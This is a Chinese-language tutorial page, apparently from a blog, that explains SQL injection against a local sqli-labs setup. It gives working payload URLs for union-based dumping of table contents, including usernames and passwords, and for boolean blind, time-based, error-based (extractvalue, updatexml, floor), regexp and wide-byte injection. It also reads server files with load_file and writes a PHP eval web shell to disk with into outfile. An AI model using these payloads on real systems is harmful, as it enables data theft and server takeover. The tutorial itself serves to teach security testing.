精华内容
下载资源
问答
  • SQL注入漏洞

    2021-04-09 09:40:57
    文章目录SQL漏洞原理SQL注入漏洞产生的条件:SQL注入介绍SQL注入的危害SQL注入类型及分析SQL注入攻击流程 SQL漏洞原理 SQL注入:指web应用程序对用户输入的数据合法性没有判断,导致攻击者可以构造不同的sql语句来...

    SQL漏洞原理

    	SQL注入:指web应用程序对用户输入的数据合法性没有判断,导致攻击者可以构造不同的sql语句来实现对数据库的操作。(web应用程序对用户输入的数据没有进行过滤,或者过滤不严,就把sql语句带进数据库中进行查询)
    

    SQL注入漏洞产生的条件:

    	①用户能控制数据的输入。
    	②原本需要执行的代码,拼接了用户的输入。
    

    SQL注入介绍

    在这里插入图片描述

    SQL注入的危害

    	①绕过登录验证:使用万能密码登录网站后台。
    	②获取敏感数据:获取网站管理员账号密码等。
    	③文件系统操作:列目录、读取、写入文件等。
    	④注册表操作:读取、写入、删除注册表等。
    	⑤执行系统命令:远程执行命令。
    

    SQL注入类型及分析

    	一般而言,SQL注入只分为数字型与字符型,因为严格来说,无论是POST注入,还是其他类型注入,都可以归纳为数字型注入或者字符型注入。
    	以下是一些常见的注入叫法:
    	POST注入:注入字段在POST数据中;
    	Cookie注入:注入字段在Cookie数据中;
    	延时注入:使用数据库延时特性注入;
    	搜索注入:注入处为搜索的地点;
    	base64注入:注入字符串需要经过base64加密;
    

    判断该SQL注入是否为数字型:
    假设后台SQL语句: SELECT * FROM TABLE WHERE id=1;
    判断数字型漏洞的SQL注入点:
    ①先在输入框中输入一个单引号’
    这样的SQL语句就会变为:

    SELECT * FROM table WHERE id=1,
    

    不符合语法,所以该语句肯定会出错,导致脚本程序无法从数据库获取数据,从而使原来的页面出现异常。
    ②在输入框中输入and 1=1
    SQL语句变为:

    SELECT * FROM table WHERE id=1 and 1 = 1
    

    语句正确,执行正常,返回的数据与原始请求无任何差异。
    ③在数据库中输入and 1=2
    SQL语句变为:

    SELECT * FROM table WHERE id=1 and 1 = 2
    

    虽然语法正确,语句执行正常,但是逻辑错误,因为1= 2为永假,所以返回数据与原始请求有差异。
    如果以上三个步骤全部满足,则程序就可能存在数字型SQL注入漏洞

    判断该SQL注入是否为字符型:
    假设后台SQL语句:SELECT *FROM TABLE WHERE id=’admin’;
    判断字符型漏洞的SQL注入点:
    ①还是先输入单引号admin’ 来测试
    这样的SQL语句就会变为:

    SELECT FROM table WHERE username =' admin'

    页面异常。
    ②输入:admin' and 1=1--
    注意:在admin后有一个单引号 ’,用于字符串闭合,最后还有一个注释符 – (两条杠后面还有一个空格!-- 后面的内容被注释,即后面的内容将不起作用。
    SQL语句变为:

    SELECT * FROM table WHERE username =' admin' and 1 = 1 --
    

    页面显示正确。
    ③输入: admin’and 1 = 2 --
    SQL语句变为:

    SELECT FROM table WHERE username =' admin' and 1=2 -- 
    

    页面错误。
    满足上面三个步骤则有可能存在字符型SQL注入

    SQL注入攻击流程

    ①判断是否存在SQL注入漏洞
    数字型:
    Url 地址中输入 http://xxx/abc.php?id= x and 1=1 页面依旧运行正常,继续进行下一步。
    Url 地址中继续输入 http://xxx/abc.php?id= x and 1=2 页面运行错误,则说明此 Sql 注入为数字型注入。
    字符型:
    Url 地址中输入 http://xxx/abc.php?id= x’ and ‘1’=‘1 页面运行正常,继续进行下一步。
    Url 地址中继续输入 http://xxx/abc.php?id= x’ and ‘1’='2 页面运行错误,则说明此 Sql 注入为字符型注入。
    ②判断网页是否存在字段
    SELECT * FROM TABLE WHERE id=1?id=1 order by 2 ,回车查看页面正常;
    SELECT * FROM TABLE WHERE id=1?id=1 order by 3 ,回车查看页面不正常;
    说明有两个字段(列名)。
    ③判断回显点
    ?id=1 and 1=2 union select 1,2,3 页面会有相应提示。(union 联合语句,将前后两次的查询结果合并在一起)。
    ④获取信息
    a. 查询当前数据库名:?id=1 and 1=2 union select 1,database()
    b. 查询当前数据库版本:?id=1 and 1=2 union select 1,version()
    c. 查询当前数据库表名:?id=1 and 1=2 union select 1,table_name from information_schema.tables where table_name=database() limit 0,1
    (limit 0,1表示从第一行起,显示一行的内容;注意:行号是从0开始排序)
    d. 查询当前表的字段名:?id=1 and 1=2 union select 1,column_name from information_schema.columns where table_name=database() and table_name=数据库表名 limit 0,1(改变limit中0的值,来显示所有字段名)
    e. 查询字段的内容:?id=1 and 1=2 union select 1,username,password from 数据库表名 limit 0,1

    order by 4 -- -
    
    	判断有多少列
    
    union select 1,2,3 -- -
    
    	判断数据显示点
    
    union select 1,user(),database()­­ -- -
    
    	显示出登录用户和数据库名
    
    union select 1,(select group_concat(table_name) from 		information_schema.tables where table_schema = 'security' ),3 -- -
    
    	查看数据库有哪些表
    
    union select 1,(select group_concat(column_name) from information_schema.columns where table_schema = 'security' and table_name='users' ),3 -- -
    
    	查看对应表有哪些列
    
    union select 1,(select group_concat(concat_ws(0x7e,username,password))from users),3 --  -
    
    	查看账号密码信息
    

    关于Mysql数据库命令函数
    1、concat()函数:将多个字符串连接成一个字符串
    语法:concat(str1,str2,…)
    举例1:select concat(id,name,score)from user;
    得到结果:1小明60
    举例2:select concat(id,’-’,name,’-’,score)from user;
    得到结果:1-小明-60
    2、concat_ws()函数:将多个字符串连接成一个字符串,但是可以一次性指定分隔符~
    语法:concat_ws(separator, str1, str2, …) 第一个参数指定分隔符。需要注意的是分隔符不能为null,如果为null,则返回结果为null。
    举例:select concat(‘,‘,id,name,score)from user;
    得到结果:1,小明,60
    3、group_concat()函数:将group by产生的同一个分组中的值连接起来,返回一个字符串结果
    语法:group_concat( [distinct] 要连接的字段 [order by 排序字段 asc/desc ] [separator ‘分隔符’] )
    举例:①select id,group_concat(name order by name desc) from aa group by id;
    以id分组,把name字段的值打印在一行,逗号分隔,以name排倒序
    在这里插入图片描述

    展开全文
  • SQL注入漏洞详解

    万次阅读 多人点赞 2018-08-23 20:51:39
    SQL注入的分类 判断是否存在SQL注入 一:Boolean盲注 二:union 注入 三:文件读写 四:报错注入 floor报错注入 ExtractValue报错注入 UpdateXml报错注入 五:时间盲注 六:REGEXP正则匹配 七:宽字节...

    目录

    SQL注入的分类

    判断是否存在SQL注入

    一:Boolean盲注

    二:union 注入

    三:文件读写

    四:报错注入

    floor报错注入

    ExtractValue报错注入

    UpdateXml报错注入 

    五:时间盲注

    六:REGEXP正则匹配

    七:宽字节注入

    八:堆叠注入

    九:二次注入

    十:User-Agent注入

    十一:Cookie注入

    十二:过滤绕过

    十三:传说中的万能密码 

    SQL注入的预防

    (1)预编译(PreparedStatement)(JSP)

    (2)PDO(PHP)

    (3)使用正则表达式过滤

    (4) 其他


    以下所有代码的环境:MySQL5.5.20+PHP

    SQL注入是因为后台SQL语句拼接了用户的输入,而且Web应用程序对用户输入数据的合法性没有判断和过滤,前端传入后端的参数是攻击者可控的,攻击者可以通过构造不同的SQL语句来实现对数据库的任意操作。比如查询、删除,增加,修改数据等等,如果数据库的用户权限足够大,还可以对操作系统执行操作。

    SQL注入可以分为平台层注入和代码层注入。前者由不安全的数据库配置或数据库平台的漏洞所致;后者主要是由于程序员对输入未进行细致地过滤。SQL注入是针对数据库、后台、系统层面的攻击!

    由于以下的环境都是MySQL数据库,所以先了解点MySQL有关的知识。

    • 5.0以下是多用户单操作
    • 5.0以上是多用户多操做

    在MySQL5.0以下,没有information_schema这个系统表,无法列表名等,只能暴力跑表名。

    在MySQL5.0以上,MySQL中默认添加了一个名为 information_schema 的数据库,该数据库中的表都是只读的,不能进行更新、删除和插入等操作,也不能加载触发器,因为它们实际只是一个视图,不是基本表,没有关联的文件。

    当尝试删除该数据库时,会爆出以下的错误!

    mysql中注释符

    • 单行注释:#   
    • 多行注释:/**/  

    information_schema数据库中三个很重要的表:

    • information_schema.schemata:  该数据表存储了mysql数据库中的所有数据库的库名
    • information_schema.tables:     该数据表存储了mysql数据库中的所有数据表的表名
    • information_schema.columns:    该数据表存储了mysql数据库中的所有列的列名

    关于这几个表的一些语法:

    // 通过这条语句可以得到第一个的数据库名  
    select schema_name from information_schema.schemata limit 0,1
    
    // 通过这条语句可以得到第一个的数据表名
    select table_name from information_schema.tables limit 0,1
    // 通过这条语句可以得到指定security数据库中的所有表名
    select table_name from information_schema.tables where table_schema='security'limit 0,1
    
    // 通过这条语句可以得到第一个的列名
    select column_name from information_schema.columns limit 0,1
    // 通过这条语句可以得到指定数据库security中的数据表users的所有列名
    select column_name from information_schema.columns where table_schema='security' and table_name='users' limit 0,1
    
    //通过这条语句可以得到指定数据表users中指定列password的第一条数据(只能是database()所在的数据库内的数据,因为处于当前数据库下的话不能查询其他数据库内的数据)
    select password from users limit 0,1

    mysql中比较常用的一些函数

    • version(): 查询数据库的版本          
    • user():查询数据库的使用者       
    • database():数据库
    • system_user():系统用户名
    • session_user():连接数据库的用户名
    • current_user:当前用户名
    • load_file():读取本地文件
    • @@datadir:读取数据库路径
    • @@basedir:mysql安装路径
    • @@version_complie_os:查看操作系统

    ascii(str) : 返回给定字符的ascii值,如果str是空字符串,返回0;如果str是NULL,返回NULL。如 ascii("a")=97

    length(str) : 返回给定字符串的长度,如  length("string")=6

    substr(string,start,length) : 对于给定字符串string,从start位开始截取,截取length长度 ,如  substr("chinese",3,2)="in"

    也可以 substr(string from start for length)

    substr()、stbstring()、mid()  三个函数的用法、功能均一致

    concat(username):将查询到的username连在一起,默认用逗号分隔

    concat(str1,'*',str2):将字符串str1和str2的数据查询到一起,中间用*连接

    group_concat(username) :将username数据查询在一起,用逗号连接

    limit 0,1:查询第1个数       limit 5:查询前5个   limit  1,1: 查询第2个数             limit  n,1: 查询第n+1个数   

    也可以 limit  1 offset 0

    更多的关于SQL语句:常见的SQL语句 

    SQL注入的分类

    依据注入点类型分类

    • 数字类型的注入
    • 字符串类型的注入
    • 搜索型注入

    依据提交方式分类

    • GET注入
    • POST注入
    • COOKIE注入
    • HTTP头注入(XFF注入、UA注入、REFERER注入)

    依据获取信息的方式分类

    • 基于布尔的盲注
    • 基于时间的盲注
    • 基于报错的注入
    • 联合查询注入
    • 堆查询注入 (可同时执行多条语句)

    判断是否存在SQL注入

    一个网站有那么多的页面,那么我们如何判断其中是否存在SQL注入的页面呢?我们可以用网站漏洞扫描工具进行扫描,常见的网站漏洞扫描工具有 AWVS、AppScan、OWASP-ZAP、Nessus 等。

    但是在很多时候,还是需要我们自己手动去判断是否存在SQL注入漏洞。下面列举常见的判断SQL注入的方式。但是目前大部分网站都对此有防御,真正发现网页存在SQL注入漏洞,还得靠技术和经验了。

    一:二话不说,先加单引号'、双引号"、单括号)、双括号))等看看是否报错,如果报错就可能存在SQL注入漏洞了。

    二:还有在URL后面加 and 1=1 、 and 1=2 看页面是否显示一样,显示不一样的话,肯定存在SQL注入漏洞了。

    三:还有就是Timing Attack测试,也就是时间盲注。有时候通过简单的条件语句比如 and 1=2 是无法看出异常的。

    在MySQL中,有一个Benchmark() 函数,它是用于测试性能的。 Benchmark(count,expr) ,这个函数执行的结果,是将表达式 expr 执行 count 次 。

    因此,利用benchmark函数,可以让同一个函数执行若干次,使得结果返回的时间比平时要长,通过时间长短的变化,可以判断注入语句是否执行成功。这是一种边信道攻击,这个技巧在盲注中被称为Timing Attack,也就是时间盲注。

    MySQL

    benchmark(100000000,md(5))

    sleep(3)

    PostgreSQL

    PG_sleep(5)

    Generate_series(1,1000000)

    SQLServer waitfor delay  '0:0:5'

    易出现SQL注入的功能点:凡是和数据库有交互的地方都容易出现SQL注入,SQL注入经常出现在登陆页面、涉及获取HTTP头(user-agent / client-ip等)的功能点及订单处理等地方。例如登陆页面,除常见的万能密码,post 数据注入外也有可能发生在HTTP头中的 client-ip 和 x-forward-for 等字段处。这些字段是用来记录登陆的 i p的,有可能会被存储进数据库中从而与数据库发生交互导致sql注入。

    一:Boolean盲注

    盲注,就是在服务器没有错误回显时完成的注入攻击。服务器没有错误回显,对于攻击者来说缺少了非常重要的信息,所以攻击者必须找到一个方法来验证注入的SQL语句是否得到了执行。

    我们来看一个例子:这是sqli的Less-5,我自己对源码稍微改动了一下,使得页面会显示执行的sql语句

    通过输入 http://127.0.0.1/sqli/Less-1/?id=1   我们得到了下面的页面

    然后输入 http://127.0.0.1/sqli/Less-5/?id=-1   我们得到下面的页面

    当我们输入  http://127.0.0.1/sqli/Less-5/?id=1 我们得到下面的页面

    由此可以看出代码把 id 当成了字符来处理,而且后面还有一个限制显示的行数  limit 0,1 。当我们输入的语句正确时,就显示You are in....   当我们输入的语句错误时,就不显示任何数据。当我们的语句有语法错误时,就报出 SQL 语句错误。

    于是,我们可以推断出页面的源代码:

    $sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";    //sql查询语句
    $result=mysql_query($sql);
    $row = mysql_fetch_array($result);
    	if($row){                    //如果查询到数据
          	  echo 'You are in...........';
      	}else{                      //如果没查询到数据
    	     print_r(mysql_error());  	
    	}
    

    于是我们可以通过构造一些判断语句,通过页面是否显示来证实我们的猜想。盲注一般用到的一些函数:ascii()substr()length(),exists()、concat()等

    1:判断数据库类型

    这个例子中出错页面已经告诉了我们此数据库是MySQL,那么当我们不知道是啥数据库的时候,如何分辨是哪个数据库呢?

    虽然绝大多数数据库的大部分SQL语句都类似,但是每个数据库还是有自己特殊的表的。通过表我们可以分辨是哪些数据库。

    MySQL数据库的特有的表是 information_schema.tables  , access数据库特有的表是 msysobjects 、SQLServer 数据库特有的表是 sysobjects ,oracle数据库特有的表是 dual。那么,我们就可以用如下的语句判断数据库。哪个页面正常显示,就属于哪个数据库

    //判断是否是 Mysql数据库
    http://127.0.0.1/sqli/Less-5/?id=1' and exists(select*from information_schema.tables) #
    
    //判断是否是 access数据库
    http://127.0.0.1/sqli/Less-5/?id=1' and exists(select*from msysobjects) #
    
    //判断是否是 Sqlserver数据库
    http://127.0.0.1/sqli/Less-5/?id=1' and exists(select*from sysobjects) #
    
    //判断是否是Oracle数据库
    http://127.0.0.1/sqli/Less-5/?id=1' and (select count(*) from dual)>0 #
    

    对于MySQL数据库,information_schema 数据库中的表都是只读的,不能进行更新、删除和插入等操作,也不能加载触发器,因为它们实际只是一个视图,不是基本表,没有关联的文件。

    information_schema.tables 存储了数据表的元数据信息,下面对常用的字段进行介绍:

    • table_schema: 记录数据库名
    • table_name: 记录数据表名
    • table_rows: 关于表的粗略行估计;
    • data_length : 记录表的大小(单位字节);

    2:判断当前数据库名(以下方法不适用于access和SQL Server数据库)

    1:判断当前数据库的长度,利用二分法
    http://127.0.0.1/sqli/Less-5/?id=1' and length(database())>5   //正常显示
    http://127.0.0.1/sqli/Less-5/?id=1' and length(database())>10   //不显示任何数据
    http://127.0.0.1/sqli/Less-5/?id=1' and length(database())>7   //正常显示
    http://127.0.0.1/sqli/Less-5/?id=1' and length(database())>8   //不显示任何数据
    
    大于7正常显示,大于8不显示,说明大于7而不大于8,所以可知当前数据库长度为 8
    
    2:判断当前数据库的字符,和上面的方法一样,利用二分法依次判断
    //判断数据库的第一个字符
    http://127.0.0.1/sqli/Less-5/?id=1' and ascii(substr(database(),1,1))>100
    
    //判断数据库的第二个字符
    http://127.0.0.1/sqli/Less-5/?id=1' and ascii(substr(database(),2,1))>100
    
    ...........
    由此可以判断出当前数据库为 security

    3:判断当前数据库中的表

    http://127.0.0.1/sqli/Less-5/?id=1' and exists(select*from admin)   //猜测当前数据库中是否存在admin表
    1:判断当前数据库中表的个数
    // 判断当前数据库中的表的个数是否大于5,用二分法依次判断,最后得知当前数据库表的个数为4
    http://127.0.0.1/sqli/Less-5/?id=1' and (select count(table_name) from information_schema.tables where table_schema=database())>5 #
    
    2:判断每个表的长度
    //判断第一个表的长度,用二分法依次判断,最后可知当前数据库中第一个表的长度为6
    http://127.0.0.1/sqli/Less-5/?id=1' and length((select table_name from information_schema.tables where table_schema=database() limit 0,1))=6
    
    //判断第二个表的长度,用二分法依次判断,最后可知当前数据库中第二个表的长度为6
    http://127.0.0.1/sqli/Less-5/?id=1' and length((select table_name from information_schema.tables where table_schema=database() limit 1,1))=6
    
    3:判断每个表的每个字符的ascii值
    //判断第一个表的第一个字符的ascii值
    http://127.0.0.1/sqli/Less-5/?id=1' and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))>100 #
    
    //判断第一个表的第二个字符的ascii值
    http://127.0.0.1/sqli/Less-5/?id=1' and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),2,1))>100 #
    
    .........
    由此可判断出存在表 emails、referers、uagents、users ,猜测users表中最有可能存在账户和密码,所以以下判断字段和数据在 users 表中判断

    4. 判断表中的字段

    http://127.0.0.1/sqli/Less-5/?id=1' and exists(select username from admin)   //如果已经证实了存在admin表,那么猜测是否存在username字段
    1:判断表中字段的个数
    //判断users表中字段个数是否大于5,这里的users表是通过上面的语句爆出来的
    http://127.0.0.1/sqli/Less-5/?id=1' and (select count(column_name) from information_schema.columns where table_name='users')>5 #
    
    2:判断字段的长度
    //判断第一个字段的长度
    http://127.0.0.1/sqli/Less-5/?id=1' and length((select column_name from information_schema.columns where table_name='users' limit 0,1))>5
    
    //判断第二个字段的长度
    http://127.0.0.1/sqli/Less-5/?id=1' and length((select column_name from information_schema.columns where table_name='users' limit 1,1))>5
    
    3:判断字段的ascii值
    //判断第一个字段的第一个字符的长度
    http://127.0.0.1/sqli/Less-5/?id=1' and ascii(substr((select column_name from information_schema.columns where table_name='users' limit 0,1),1,1))>100
    
    //判断第一个字段的第二个字符的长度
    http://127.0.0.1/sqli/Less-5/?id=1' and ascii(substr((select column_name from information_schema.columns where table_name='users' limit 0,1),2,1))>100
    
    ...........
    由此可判断出users表中存在 id、username、password 字段

    5.判断字段中的数据

    我们知道了users中有三个字段 id 、username 、password,我们现在爆出每个字段的数据
    
    1: 判断数据的长度
    // 判断id字段的第一个数据的长度
    http://127.0.0.1/sqli/Less-5/?id=1' and length((select id from users limit 0,1))>5
    
    // 判断id字段的第二个数据的长度
    http://127.0.0.1/sqli/Less-5/?id=1' and length((select id from users limit 1,1))>5
    
    2:判断数据的ascii值
    // 判断id字段的第一个数据的第一个字符的ascii值
    http://127.0.0.1/sqli/Less-5/?id=1' and ascii(substr((select id from users limit 0,1),1,1))>100
    
    // 判断id字段的第一个数据的第二个字符的ascii值
    http://127.0.0.1/sqli/Less-5/?id=1' and ascii(substr((select id from users limit 0,1),2,1))>100
    
    ...........

    二:union 注入

    union联合查询适用于有显示列的注入。

    我们可以通过order by来判断当前表的列数。最后可得知,当前表有3列

    http://127.0.0.1/sqli/Less-1/?id=1' order by 3 #

    我们可以通过 union 联合查询来知道显示的列数

    127.0.0.1/sqli/Less-1/?id=1' union select 1 ,2 ,3 #

    咦,这里为啥不显示我们联合查询的呢?因为这个页面只显示一行数据,所以我们可以用 and 1=2 把前面的条件给否定了,或者我们直接把前面 id=1 改成 id =-1 ,在后面的代码中,都是将 id=-1进行注入

    http://127.0.0.1/sqli/Less-1/?id=1' and 1=2 union select 1,2,3 #
    
    http://127.0.0.1/sqli/Less-1/?id=-1' union select 1,2,3 #

    这样,我们联合查询的就显示出来了。可知,第2列和第3列是显示列。那我们就可以在这两个位置插入一些函数了。

    我们可以通过这些函数获得该数据库的一些重要的信息

    • version() :数据库的版本    
    • database() :当前所在的数据库   
    • @@basedir :  数据库的安装目录
    • @@datadir : 数据库文件的存放目录    
    • user() : 数据库的用户  
    • current_user() : 当前用户名
    • system_user() : 系统用户名    
    • session_user() :连接到数据库的用户名
    http://127.0.0.1/sqli/Less-1/?id=-1'  union select 1,version(),user() #

    http://127.0.0.1/sqli/Less-1/?id=-1'  union select 1,database(),@@basedir #

    http://127.0.0.1/sqli/Less-1/?id=-1'   union select 1,@@datadir,current_user() #

    我们还可以通过union注入获得更多的信息。

    // 获得所有的数据库 
    http://127.0.0.1/sqli/Less-1/?id=-1'  union select 1,group_concat(schema_name),3 from information_schema.schemata#
    
    // 获得所有的表
    http://127.0.0.1/sqli/Less-1/?id=-1'  union select 1,group_concat(table_name),3 from information_schema.tables#
    
    // 获得所有的列
    http://127.0.0.1/sqli/Less-1/?id=-1'  union select 1,group_concat(column_name),3 from information_schema.columns#
    
    #获取当前数据库中指定表的指定字段的值(只能是database()所在的数据库内的数据,因为处于当前数据库下的话不能查询其他数据库内的数据)
    http://127.0.0.1/sqli/Less-1/?id=-1'  union select 1,group_concat(password),3 from users%23

     当我们已知当前数据库名security,我们就可以通过下面的语句得到当前数据库的所有的表

    http://127.0.0.1/sqli/Less-1/?id=-1'  union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security' #

    我们知道了当前数据库中存在了四个表,那么我们可以通过下面的语句知道每一个表中的列

    http://127.0.0.1/sqli/Less-1/?id=-1' union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='security' and table_name='users' #

    如下,我们可以知道users表中有id,username,password三列

    我们知道存在users表,又知道表中有 id ,username, password三列,那么我们可以构造如下语句

    http://127.0.0.1/sqli/Less-1/?id=-1'  union select 1,group_concat(id,'--',username,'--',password),3 from users #

    我们就把users表中的所有数据都给爆出来了

    三:文件读写

    • 当有显示列的时候,文件读可以利用 union 注入。
    • 当没有显示列的时候,只能利用盲注进行数据读取。

    示例:读取e盘下3.txt文件

    union注入读取文件(load_file)

    //union注入读取 e:/3.txt 文件
    http://127.0.0.1/sqli/Less-1/?id=-1'   union select 1,2,load_file("e:/3.txt")#
    
    //也可以把 e:/3.txt 转换成16进制 0x653a2f332e747874
    http://127.0.0.1/sqli/Less-1/?id=-1'   union select 1,2,load_file(0x653a2f332e747874)#

     

    盲注读取文件

    //盲注读取的话就是利用hex函数,将读取的字符串转换成16进制,再利用ascii函数,转换成ascii码,再利用二分法一个一个的判断字符,很复杂,一般结合工具完成
    http://127.0.0.1/sqli/Less-1/?id=-1' and ascii(mid((select hex(load_file('e:/3.txt'))),18,1))>49#' LIMIT 0,1

    我们可以利用写入文件的功能,在e盘创建4.php文件,然后写入一句话木马

    union写入文件(into outfile)

    //利用union注入写入一句话木马  into outfile 和 into dumpfile 都可以
    http://127.0.0.1/sqli/Less-1/?id=-1'  union select 1,2,'<?php @eval($_POST[aaa]);?>'  into outfile  'e:/4.php' #
    
    // 可以将一句话木马转换成16进制的形式
    http://127.0.0.1/sqli/Less-1/?id=-1'  union select 1,2,0x3c3f70687020406576616c28245f504f53545b6161615d293b3f3e  into outfile  'e:/4.php' #

    四:报错注入

    利用前提: 页面上没有显示位,但是需要输出 SQL 语句执行错误信息。比如 mysql_error()
    优点: 不需要显示位
    缺点: 需要输出 mysql_error( )的报错信息

    floor报错注入

    floor报错注入是利用 count()函数 rand()函数 floor()函数 group by 这几个特定的函数结合在一起产生的注入漏洞。缺一不可

    // 我们可以将 user() 改成任何函数,以获取我们想要的信息。具体可以看文章开头关于information_schema数据库的部分
    http://127.0.0.1/sqli/Less-1/?id=-1'  and (select 1 from (select count(*) from information_schema.tables group by concat(user(),floor(rand(0)*2)))a) #
    
    //将其分解
    (select 1 from (Y)a)
    
    Y= select count(*) from information_schema.tables group by concat(Z)
    
    Z= user(),floor(rand(0)*2)           //将这里的 user() 替换成我们需要查询的函数

    floor报错注入参考:https://blog.csdn.net/zpy1998zpy/article/details/80650540

    ExtractValue报错注入

    EXTRACTVALUE (XML_document, XPath_string)

    • 第一个参数:XML_document 是 String 格式,为 XML 文档对象的名称
    • 第二个参数:XPath_string (Xpath 格式的字符串).

    作用:从目标 XML 中返回包含所查询值的字符串

    ps: 返回结果 限制在32位字符

    // 可以将 user() 改成任何我们想要查询的函数和sql语句 ,0x7e表示的是 ~
    http://127.0.0.1/sqli/Less-1/?id=-1'  and extractvalue(1,concat(0x7e,user(),0x7e))#
    
    // 通过这条语句可以得到所有的数据库名,更多的关于informaion_schema的使用看文章头部
    http://127.0.0.1/sqli/Less-1/?id=-1'  and extractvalue(1,concat(0x7e,(select schema_name from information_schema.schemata limit 0,1),0x7e))#
    

    UpdateXml报错注入 

    UpdateXml 函数实际上是去更新了XML文档,但是我们在XML文档路径的位置里面写入了子查询,我们输入特殊字符,然后就因为不符合输入规则然后报错了,但是报错的时候他其实已经执行了那个子查询代码!

    UPDATEXML (XML_document, XPath_string, new_value)

    • 第一个参数:XML_document 是 String 格式,为 XML 文档对象的名称,文中为 Doc 1
    • 第二个参数:XPath_string (Xpath 格式的字符串) ,如果不了解 Xpath 语法,可以在网上查找教程。
    • 第三个参数:new_value,String 格式,替换查找到的符合条件的数据

    作用:改变文档中符合条件的节点的值

    // 可以将 user() 改成任何我们想要查询的函数和sql语句 ,0x7e表示的是 ~
    http://127.0.0.1/sqli/Less-1/?id=-1'  and updatexml(1,concat(0x7e,user(),0x7e),1)#
    
    // 通过这条语句可以得到所有的数据库名,更多的关于informaion_schema的使用看文章头部
    http://127.0.0.1/sqli/Less-1/?id=-1'  and updatexml(1,concat(0x7e,(select schema_name from information_schema.schemata limit 0,1),0x7e),1)#
    

     

    更多的关于报错注入的文章:https://blog.csdn.net/cyjmosthandsome/article/details/87947136

                                                   https://blog.csdn.net/he_and/article/details/80455884

    五:时间盲注

    Timing Attack注入,也就是时间盲注。通过简单的条件语句比如 and 1=2 是无法看出异常的。

    在MySQL中,有一个Benchmark() 函数,它是用于测试性能的。 Benchmark(count,expr) ,这个函数执行的结果,是将表达式 expr 执行 count 次 。

    因此,利用benchmark函数,可以让同一个函数执行若干次,使得结果返回的时间比平时要长,通过时间长短的变化,可以判断注入语句是否执行成功。这是一种边信道攻击,这个技巧在盲注中被称为Timing Attack,也就是时间盲注。

    MySQL

    benchmark(100000000,md5(1))

    sleep(3)

    PostgreSQL

    PG_sleep(5)

    Generate_series(1,1000000)

    SQLServer waitfor delay  '0:0:5'

    利用前提:页面上没有显示位,也没有输出 SQL 语句执行错误信息。正确的 SQL 语句和错误的 SQL 语句返回页面都一样,但是加入 sleep(5)条件之后,页面的返回速度明显慢了 5 秒。
    优点:不需要显示位,不需要出错信息。
    缺点:速度慢,耗费大量时间

    sleep 函数判断页面响应时间               if(判断条件,为true时执行,为false时执行)

    我们可以构造下面的语句,判断条件是否成立。然后不断变换函数直到获取到我们想要的信息

    //判断是否存在延时注入
    http://127.0.0.1/sqli/Less-1/?id=1' and sleep(5)#
    
    // 判断数据库的第一个字符的ascii值是否大于100,如果大于100,页面立即响应,如果不大于,页面延时5秒响应
    http://127.0.0.1/sqli/Less-1/?id=1' and if(ascii(substring(database(),1,1))<100,1,sleep(5)) #

    六:REGEXP正则匹配

    正则表达式,又称规则表达式(Regular Expression,在代码中常简写为regex、regexp或RE),计算机科学的一个概念。正则表达式通常被用来检索、替换那些符合某个模式(规则)的文本

    查找name字段中含有a或者b的所有数据:        select name from admin where name regexp ' a|b ';
    查找name字段中含有ab,且ab前有字符的所有数据(.匹配任意字符): select name from admin where name regexp ' .ab ';
    查找name字段中含有at或bt或ct的所有数据:   select name from admin where name regexp ' [abc]t ';
    查找name字段中以a-z开头的所有数据:          select name from admin where name regexp ' ^[a-z] ';

    已知数据库名为 security,判断第一个表的表名是否以 a-z 中的字符开头,^[a-z]  -->  ^a ; 判断出了第一个表的第一个字符,接着判断第一个表的第二个字符 ^a[a-z] -->  ^ad ;  就这样,一步一步判断第一个表的表名  ^admin$ 。然后 limit 1,1 判断第二个表

    // 判断security数据库下的第一个表的是否以a-z的字母开头
    http://127.0.0.1/sqli/Less-1/?id=1' and  1=(select 1 from information_schema.tables where table_schema='security' and table_name regexp '^[a-z]' limit 0,1) #

    参考文档:http://www.cnblogs.com/lcamry/articles/5717442.html

    七:宽字节注入

    宽字节注入是由于不同编码中中英文所占字符的不同所导致的。通常来说,在GBK编码当中,一个汉字占用2个字节。而在UTF-8编码中,一个汉字占用3个字节。在php中,我们可以通过输入 echo strlen("中") 来测试,当为GBK编码时,输入2,而为UTF-8编码时,输出3。除了GBK以外,所有的ANSI编码都是中文都是占用两个字节。

    相关文章:字符集与字符编码

    在说之前,我们先说一下php中对于sql注入的过滤,这里就不得不提到几个函数了。

    addslashes() :这个函数在预定义字符之前添加反斜杠 \ 。预定义字符:  单引号 ' 、双引号 " 、反斜杠 \ 、NULL。但是这个函数有一个特点就是虽然会添加反斜杠 \ 进行转义,但是 \ 并不会插入到数据库中。这个函数的功能和魔术引号完全相同,所以当打开了魔术引号时,不应使用这个函数。可以使用 get_magic_quotes_gpc() 来检测是否已经转义。

    mysql_real_escape_string() :这个函数用来转义sql语句中的特殊符号x00 、\n  、\r  、\  、‘  、“ 、x1a。

    魔术引号:当打开时,所有的单引号’ 、双引号" 、反斜杠\  和 NULL 字符都会被自动加上一个反斜线来进行转义,这个和 addslashes() 函数的作用完全相同。所以,如果魔术引号打开了,就不要使用 addslashes() 函数了。一共有三个魔术引号指令。

    • magic_quotes_gpc 影响到 HTTP 请求数据(GET,POST 和 COOKIE)。不能在运行时改变。在 PHP 中默认值为 on。 参见 get_magic_quotes_gpc()。如果 magic_quotes_gpc 关闭时返回 0,开启时返回 1。在 PHP 5.4.0 起将始终返回 0,因为这个魔术引号功能已经从 PHP 中移除了。
    • magic_quotes_runtime 如果打开的话,大部份从外部来源取得数据并返回的函数,包括从数据库和文本文件,所返回的数据都会被反斜线转义。该选项可在运行的时改变,在 PHP 中的默认值为 off。 参见 set_magic_quotes_runtime() 和 get_magic_quotes_runtime()。
    • magic_quotes_sybase (魔术引号开关)如果打开的话,将会使用单引号对单引号进行转义而非反斜线。此选项会完全覆盖 magic_quotes_gpc。如果同时打开两个选项的话,单引号将会被转义成 ''。而双引号、反斜线 和 NULL 字符将不会进行转义。 

    可以在 php.ini 中看这几个参数是否开启

    我们这里搭了一个平台来测试,这里得感谢其他大佬的源码。

    测试代码及数据库:http://pan.baidu.com/s/1eQmUArw 提取密码:75tu

    首先,我们来看一下1的源码,这对用户输入的id用 addslashes() 函数进行了处理,而且是当成字符串处理。

